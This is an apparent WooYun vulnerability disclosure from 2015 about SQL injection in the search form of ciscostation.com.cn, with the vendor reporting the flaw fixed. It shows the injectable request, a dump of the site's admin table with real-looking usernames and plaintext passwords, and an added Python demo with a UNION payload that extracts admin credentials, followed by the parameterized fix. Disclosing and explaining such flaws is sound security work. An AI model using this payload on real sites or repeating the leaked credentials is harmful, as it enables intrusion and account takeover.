WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-09-11: Details sent to the vendor, awaiting vendor response
2015-09-11: Vendor confirmed; details visible to the vendor only
2015-09-21: Details disclosed to core white hats and domain experts
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-19: Vendor fixed the vulnerability and disclosed it proactively; details public
Summary: as in the title.
Digital China's Cisco Network Station (神州数码思科网络加油站) has a SQL injection at the following URL; the injectable input is the Keyword POST parameter.
POST /Search.jsp?Result=products HTTP/1.1
Host: www.ciscostation.com.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.ciscostation.com.cn/Search.jsp
Cookie: ASPSESSIONIDASQSBBAB=KMBOAHBAOMHLDEKFFAKCHJMA; CNZZDATA2213581=cnzz_eid%3D1781471836-1441885202-http%253A%252F%252Fwww.ciscostation.com.cn%252F%26ntime%3D1441885202; news=%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u8D44%u8BAF%u4E2D%u5FC3^http%3A//www.ciscostation.com.cn/NewsList.jsp%3FSortID%3D1$%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u8D44%u8BAF%u4E2D%u5FC3-%u601D%u79D1%u6760%u4E0AVMware%20%u8F6F%u786C%u4E4B%u4E89%u62A2%u593ASDN%u5927%u9910^http%3A//www.ciscostation.com.cn/NewsView.jsp%3FID%3D3364$%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u4F1A%u5458%u767B%u5F55^http%3A//www.ciscostation.com.cn/login.jsp$%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u7AD9%u5185%u641C%u7D22^http%3A//www.ciscostation.com.cn/Search.jsp$|; bdshare_firstime=1441885200707
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

Keyword=%E6%9F%A5%E8%AF%A2%E4%BA%A7%E5%93%81
6 databases were found.
Taking the cisstation database as an example, a large number of tables were found (partial listing):
Database: cisstation
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| hyjltable            | 43973   |
| ucssn                | 32243   |
| scorelog             | 14028   |
| bbstiezi             | 7714    |
| classname            | 5653    |
| qianbo_news          | 3345    |
| moneyjl              | 3320    |
| application          | 3282    |
| cases                | 2954    |
| bbshuiyuan           | 2810    |
| equiptmentnum        | 2789    |
| personnum            | 1551    |
| response             | 1063    |
(listing truncated in the original report)
Taking the admin table as an example, the site administrators' usernames and passwords are exposed. The passwords are stored in plaintext, and seven of the twelve accounts (including the super administrator) use 000000:
Database: cisstation
Table: admin
[12 entries]
+----+------------------------------------+-----------+-----------+-----------------------+------------+
| id | Explain                            | AdminName | Password  | UserName              | AddTime    |
+----+------------------------------------+-----------+-----------+-----------------------+------------+
| 1  | all permissions                    | admin     | 000000    | Super administrator   | 2012-01-01 |
| 2  | all article-management permissions | xiaomiao  | 99mojod5  | Article administrator | 2012-01-01 |
| 10 | UCS                                | uscdf     | www345    | Zheng Fang            | 2012-06-07 |
| 11 | quyu                               | xqadmin   | 000000    | West region           | 2012-06-11 |
| 12 | quyu                               | nqadmin   | 000000    | South region          | 2012-06-11 |
| 13 | quyu                               | bqadmin   | 000000    | North region          | 2012-06-11 |
| 14 | quyu                               | dqadmin   | 000000    | East region           | 2012-06-11 |
| 15 | quyu                               | hzadmin   | 000000    | Central China region  | 2012-06-11 |
| 28 | UCS                                | ucsadmin  | 000000    | UCS administrator     | 2012-06-07 |
| 31 | fuwu                               | fwadmin   | 2012fw    | Service administrator | 2012-11-01 |
| 32 | PAI                                | auction   | admin9982 | Auction administrator | 2013-03-01 |
| 33 | yinhe                              | sradmin   | yinhe     | Yinhe administrator   | 2013-07-01 |
+----+------------------------------------+-----------+-----------+-----------------------+------------+
(Explain and UserName values translated from Chinese; AdminName, Password and AddTime as dumped)
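The report shows the injection point (the Keyword form field) and the result (the admin table dumped), but not the server-side code. The following is an added example, not code from the report or from the site: a hypothetical reconstruction of a search handler that concatenates Keyword into a LIKE query, the UNION payload that turns that into a dump of the admin table, and the parameterized form that stops it. It uses an in-memory SQLite database with constructed placeholder rows (table and column names follow the dump above; the credentials are not the real ones), and request_body() shows how the page's Keyword=%E6%9F%A5... body is produced from a plain keyword.

```python
import sqlite3
from urllib.parse import quote

# Constructed in-memory stand-in for the site's database. Table and column
# names follow the dump in the report; the rows are placeholders, not real data.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
CREATE TABLE admin (id INTEGER PRIMARY KEY, AdminName TEXT, Password TEXT, UserName TEXT);
INSERT INTO products VALUES (1, 'Catalyst 2960', '48-port access switch');
INSERT INTO products VALUES (2, 'ASA 5505', 'small-office firewall');
INSERT INTO admin VALUES (1, 'admin', 'placeholder-pw-1', 'super administrator');
INSERT INTO admin VALUES (2, 'xiaomiao', 'placeholder-pw-2', 'article administrator');
"""


def connect():
    """Create the constructed database fresh for each demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def request_body(keyword):
    """Form body as the captured request shows it: Keyword=<percent-encoded UTF-8>."""
    return "Keyword=" + quote(keyword)


def vulnerable_search(conn, keyword):
    """Hypothetical reconstruction of the flaw: Keyword is pasted into the SQL
    text, so a quote inside it ends the LIKE pattern and the rest is parsed as SQL."""
    sql = "SELECT name, description FROM products WHERE name LIKE '%" + keyword + "%'"
    return conn.execute(sql).fetchall()


def safe_search(conn, keyword):
    """Fixed form: the pattern travels as a bound parameter, never as SQL text."""
    sql = "SELECT name, description FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + keyword + "%",)).fetchall()


# UNION payload: the leading quote closes the LIKE pattern (leaving '%', which
# matches every product), the SELECT has the same two columns as the product
# query, and '--' comments out the trailing %'. Prefixing AdminName with a
# marker lets the attacker separate injected rows from genuine product hits.
ADMIN_DUMP_PAYLOAD = "' UNION SELECT 'ADMIN:' || AdminName, Password FROM admin -- "


def dump_admins(conn):
    """Extract {AdminName: Password} through the vulnerable search path."""
    rows = vulnerable_search(conn, ADMIN_DUMP_PAYLOAD)
    return {name[len("ADMIN:"):]: pw for name, pw in rows if name.startswith("ADMIN:")}


if __name__ == "__main__":
    db = connect()
    print(request_body("查询产品"))          # the body from the captured request
    print(dump_admins(db))                   # admin credentials via the flaw
    print(safe_search(db, ADMIN_DUMP_PAYLOAD))  # [] : the fix treats it as text
```

Against the vulnerable handler the payload returns the product rows plus one marked row per admin account; against the parameterized handler the same payload is just an unlikely LIKE pattern and returns nothing. The fix is the bound parameter, not input filtering: nothing the user sends can change the statement's structure.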
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-09-11 10:26
Please handle as soon as possible.
2015-10-19: Fixed